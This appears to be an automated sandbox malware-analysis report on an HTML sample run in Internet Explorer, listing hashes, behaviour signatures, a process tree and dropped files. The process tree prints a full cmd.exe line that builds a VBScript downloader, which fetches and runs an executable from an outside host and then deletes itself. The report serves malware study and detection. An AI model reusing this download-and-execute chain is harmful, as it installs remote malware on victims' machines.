Analysis

  • max time kernel
    120s
  • max time network
    132s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    19-09-2024 05:44

General

  • Target

    eab1b26e06a91f5532d7e5382269c7d3_JaffaCakes118.html

  • Size

    17KB

  • MD5

    eab1b26e06a91f5532d7e5382269c7d3

  • SHA1

    bd01eb29b9a3678c6842a0142be9748733e22cdf

  • SHA256

    42e7d0d6325157c35944e0cc4b2a07b3dece5b41bdb9e3be1557e7970e352c33

  • SHA512

    59b09596a9ee90be6298523aa97439e3e9520206f439f2d6f0b13309f2e40ce3b3abddbe8d998220d1756dd167be3bf5ede97be80420653a0f2feaf8419e135c

  • SSDEEP

    384:k03+e+z3FU5dHdBve+z3Fb4e+z3Fme+z3Fq:4f+fafAfA

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\eab1b26e06a91f5532d7e5382269c7d3_JaffaCakes118.html
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2764
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2764 CREDAT:275457 /prefetch:2
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2824
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c CD %TEMP%&@echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>XPUKgOHC.vbs&@echo objXMLHTTP.open "GET","http://natmasla.ru/ath/sploit/natmasla.exe",false>>XPUKgOHC.vbs&@echo objXMLHTTP.send()>>XPUKgOHC.vbs&@echo If objXMLHTTP.Status=200 Then>>XPUKgOHC.vbs&@echo Set objADOStream=CreateObject("ADODB.Stream")>>XPUKgOHC.vbs&@echo objADOStream.Open>>XPUKgOHC.vbs&@echo objADOStream.Type=1 >>XPUKgOHC.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>XPUKgOHC.vbs&@echo objADOStream.Position=0 >>XPUKgOHC.vbs&@echo objADOStream.SaveToFile "%TEMP%\natmasla.exe">>XPUKgOHC.vbs&@echo objADOStream.Close>>XPUKgOHC.vbs&@echo Set objADOStream=Nothing>>XPUKgOHC.vbs&@echo End if>>XPUKgOHC.vbs&@echo Set objXMLHTTP=Nothing>>XPUKgOHC.vbs&@echo Set objShell=CreateObject("WScript.Shell")>>XPUKgOHC.vbs&@echo objShell.Exec("%TEMP%\natmasla.exe")>>XPUKgOHC.vbs&cscript.exe %TEMP%\XPUKgOHC.vbs&del %TEMP%\XPUKgOHC.vbs
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2112
        • C:\Windows\SysWOW64\cscript.exe
          cscript.exe C:\Users\Admin\AppData\Local\Temp\XPUKgOHC.vbs
          4⤵
          • Blocklisted process makes network request
          • System Location Discovery: System Language Discovery
          • Modifies system certificate store
          PID:2604

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    57b3655cab7b9035b07e3c9487f7528a

    SHA1

    79695b8d9422cfb15ace910f98e259db296dbbdc

    SHA256

    2642813c0dce79c9e0ba7d090b59cbd2dcfd131093462dd51f1d8165ff53764e

    SHA512

    147a2de235674b7d6e654cebeb6a36b0b0a5958178feb103df6d381dce7933faf4498f0372d34bfeb60fb7f93e91f0774d9ad18200e6e0cb1a6daeacad554009

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    478111276de9ee93a0f09748b6c618bf

    SHA1

    9ce02fd5872667469e2ac9dcbb0e66a4c94c7730

    SHA256

    a40cdcc4e8789f39b1e743b6b0b57ae7b0432f5381b3f0be8863d1310e95d21c

    SHA512

    8492595764ffe8142b28f654d3b9a31933b38d1c8431c44f8da446757c0ff9f4a1b3552edce0b81cdcf20f819602a790e16affa7a870f1792b0cb25195b3fbf1

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    272086328ba88a8dca625a306d816dd0

    SHA1

    388ba245acd0a55cf7d25fc8fc72402624e0b90d

    SHA256

    e92a7d52323c6fc026fe80df3cc803d04f1b1c8d102eb54a4234fb25054996e3

    SHA512

    7eed086ec21ce57815f774c330b02f8c0cbea4b89cfb417b3da4000367d437ce6c0b3bed92830b0864135f516b55e4fea199dd790bd87eb95c897157118c8b42

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    930ecddbdbf23c38abeefff0f276d161

    SHA1

    d5974c04d17dee53e22e88478713ee53ebce5a07

    SHA256

    ec7140332d9681a4abf565e273d70befff31eb6b538ea319cfd0c2bae61e1aee

    SHA512

    c0ead9da75f5145a0202b1843a1357b7d46f98b71e52a0840abd6bae0339c52de74c12b14af65f94cb09fbc76935559f907f3e8037555593f8601c9c2c24b056

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    4780c451bd1546fbfeb49373fcf020cc

    SHA1

    ca48eaab9cca3a80e62a2c2cdda79cae4e814729

    SHA256

    2b780b64167793b8cba86c061642faa4f20c43966a8ed1d399be527d2473cca7

    SHA512

    4842da64f7b0e0dfbb159e7a6ce6616f3056beaa35c1db475cb581fc47825e7eb18d2a8e697e23e7da48ba6d322b8d0acae56664a1cd4f8072a04fabd953d2b0

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    b14878a1612eef0d863bfa91234afa08

    SHA1

    4a60a88dc3ce22c035f6e946efdc52b361f4ea31

    SHA256

    7030aff40924fdd960d5f1cfd3fb6639eb4bed26eba5d9f8f3fb967273d0d269

    SHA512

    20a0d4fc784304a27cfad3edd8d3158af00a65f881b0c306eae4c697e77980feb6257f4d72be58e6128f5dc1d19ffcbb1d8c501b47df700c7df539bfaa85c3ff

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    f3086d54cd77cf9aac45cba33304705a

    SHA1

    7be74290f833f164ce4148e01466f7f6019f7cad

    SHA256

    33541936f2164a2c9198c2acaa8a368447dfe2d24c2deefaea49829d1e76028f

    SHA512

    9451d8a6aaa1334f2ceb9435070ba38eeb42ba287b6812830e3d8a2a724d203076d1b588bcdd6e02b551d0d5fabe9976cb2d0628e57ca050587b1c6a1b14dc52

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    2f5761c4336fbf33366ef6f3ff43b7c9

    SHA1

    eb37e66f53203e301f883a1a52a5a90bd3498e16

    SHA256

    ce52e44386675c89e501f23e23c21b43e6757066e7b28984aa076ae10230216a

    SHA512

    8ef3223c2a8421ccd075ba1ab0ff64c33cee55bc4feb71cde812b5f7a4eab5e218f9f09a8a5070b24fc701c145f1e31845c879041902ed404e867609627cd422

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    9a5d07f29263c70ae09fcc6b8defff6d

    SHA1

    621200034def40a8143a9b118d6bfa05fe7be977

    SHA256

    266d39ca0ebbc4f7bac7a618cea99b8703de03a1e294dd2ac7bf212409ae59dd

    SHA512

    79c6cabc5088cb35dede578607299a7d8b7a61f50aafc209bf21a7e0719da5ab9d6f3e57400222cb3a0f57166dee6bada448ed8e577efb066770ad464e6a8e62

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    b0f6c52a389b88f235b4d6ddad4883d5

    SHA1

    34b9d81ebbb1322e16c67fbe3227ee39f365a6c5

    SHA256

    9aeda33eaebb415c7397a4b8aefa35d2db315df494183970a41d80809935a289

    SHA512

    1b1c012615310d759116fbcca95db3389efa64e9768c535a1bade8562b07c0b18a4254d6f32eb8cd5c767aae73a7d9d64680b83daf8c65bf0d2e7fb88ab11f49

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    b04744f2a53b2cc88491a1b828588467

    SHA1

    f2145d7d059d5325cb384baec32099d73f522499

    SHA256

    fa2dd6e203fc11eb876b7a4649a96ad0af07a2630eedcdd00511ada8b605cda9

    SHA512

    3e9a7a2d8947a51b43e87d812e76830fa523f47f02a965c558c102bc5a5ea3ec57be4422ec33a865d820a46fdd87f8f996e1d76a66558c722d1e38326ab611d8

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    ea810b40c850c5a98ab3d30fd7a1e976

    SHA1

    e0cb2121169416dd2fe01b07ca92fb5a3774af8c

    SHA256

    a516f7fa00992d4825b80350f311231281ee67298be3d9e327f90a635786515f

    SHA512

    40f770f500d9a1d2cd376ceaca28cdb53aff93f8c90cd6052d08f2003352af64f9189f361e7bbd31d65ad534d0d5d987b501c41cac4da31d597bd88fed90de0e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    64345f1c7bc852c1d4ce37e80c694cf5

    SHA1

    77ca87a75356414992ca2a77bfb3f01378ba6627

    SHA256

    cdd29447faebf405580109ed59c4b8ad64b54ff083cd0315dff4bbfd64e224dc

    SHA512

    4da5782d84254ab6de3880f4df225ceb5e5f92da1b73c85ae17ba63924967f6f62658d5d7c145abe5402d9720213c4e4494ea5a6511000dca596ad11adeb1eac

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    b613205fe28e7767e2f4594940c03f59

    SHA1

    e3970e8e9716f29ccac87bc23314ad2a31111df8

    SHA256

    e573bdc3cde0fe44d04b42d467caef208735f23192fa0822407d7be9915a11cd

    SHA512

    76f7d17e17caaedfbfb89a66dfa792a4fec56bf34334daab28e45909e5caf45836f75f7b954af2d4e4b07390a1281a6efc11df25f8226e6081bcd5847eb99cc9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    de92fdf256807f8489027338648e0616

    SHA1

    b8b30e1cab77842016b1c4a4f8aae04cb8a5cde3

    SHA256

    a088a6bd8002d7c477e447d774b4a155c986bd7c0088c3a9e8a91ff8f9c00679

    SHA512

    c6a08c51094e68849ae7e1c8555d6d17bb430b8b1081c0f29e2b32f170a760620cdfdac9788083460e9ae3204576b9353c449f6bda456c8e03f94f7fadfc4eae

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    dde821fd2241d6269130dad304ed430a

    SHA1

    f4677c9032f1c7a6029a4184e5725d7bce1721e0

    SHA256

    24c4c7a797d618a708142fc6652bb0a6df95d4bd6a9da6368e8e01a9afb8a70f

    SHA512

    7a37a23d59878aee3a300d25eb7bf589cdbae222a078dc575d740fe5e7222bc7b457544806c717aae7b37ecad901b47741b9bbb20945f5b3ddd9fccd8a8e51ad

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    1c24c8b5321fde051a31f7720eb2bfc0

    SHA1

    2740017a0d0588b31d730c23d748c32351205d2e

    SHA256

    c257498bebd20d8c19b53005c09c7ae274be7d6b7333b8721a77cca0ffaaaa9c

    SHA512

    9abade5f4b0a74cb3445da439a4fff2b992b958ced6f23d1b559dfdbf59bb2f368e5f9468ee1e2fb4ae7f327c894345d2799b627e3c9101cedf94ef40b801b6b

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    2fbf42dc3d47a0c40e6c1da5d66c9c81

    SHA1

    1d864abf2c95912137ca975ceea8467f7a43502e

    SHA256

    909f6c3a3b6086e32fd59e999f30fcb4c1050588efe23fd476d2ef0db68cfdec

    SHA512

    0dafb248095cf785fb4d0a72c5585701ebf83b26446ccd2bbb2ba7dd80adb59bd8b8d7cae4434f50bc550e606ff6dcde36e83cc31b7097b1ea27e4cba761183a

  • C:\Users\Admin\AppData\Local\Temp\Cab4D95.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\Tar4DA7.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Local\Temp\XPUKgOHC.vbs

    Filesize

    590B

    MD5

    56959496ff43313df107f921870bc5b3

    SHA1

    47f0164434e1408ccf3f4590650edcdea09e5e47

    SHA256

    0f2e4027c87957eba8d868f5ded4829845131c3435ddfba4575c8ef241062524

    SHA512

    2e44553c08f8e060e7b99a6da156d26b443bed244ee2b4e77e0b11dd0c4845b69b8450d158940752411d1dd5f7c997ea6c41752d71cc66b5edda5372ab502062